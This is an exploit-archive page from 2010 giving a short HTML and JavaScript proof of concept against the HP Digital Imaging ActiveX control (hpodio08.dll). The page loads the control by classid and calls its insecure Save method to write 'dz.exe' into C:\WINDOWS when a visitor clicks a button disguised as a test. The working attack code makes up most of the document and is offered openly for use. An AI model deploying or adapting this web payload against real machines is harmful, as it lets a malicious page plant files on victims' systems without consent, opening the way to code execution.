HP Digital Imaging (hpodio08.dll) Insecure Method Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : HP Digital Imaging (hpodio08.dll) Insecure Method Exploit
# Published : 2010-04-24
# Author : ThE g0bL!N
# Previous Title : Rumba ftp Client 4.2 PASV BoF (SEH)
# Next Title : Xftp client 3.0 PWD Remote Exploit

# Exploit Title: HP Digital Imaging (hpodio08.dll) Insecure Method Exploit 
# Author: ThE g0bL!N
# Version: All vesion 
# Tested on: Windows xp pack 2
# Code : <title>Exploited By : ThE g0bL!N </title> 
<BODY> 
<object id=dz classid="clsid:{697F5209-0494-11D6-A2B0-0060B0FBD872}"></object> 

<SCRIPT> 

function Do_it() 
{ 
File = "dz.exe" 
dz.Save(File) 
} 

</SCRIPT> 
<h3>HP Digital Imaging (hpodio08.dll) Insecure Method Exploit </h3> 
<input language=JavaScript onclick=Do_it() type=button value="Click here To Test"><br> 
</body> 
</HTML>
## Note: Dz.exe Will be created In C:WINDOWS :) 
## 01110010 01100001 01111010 01101001 01101011 01100001 00100000 I try To hate You but i can't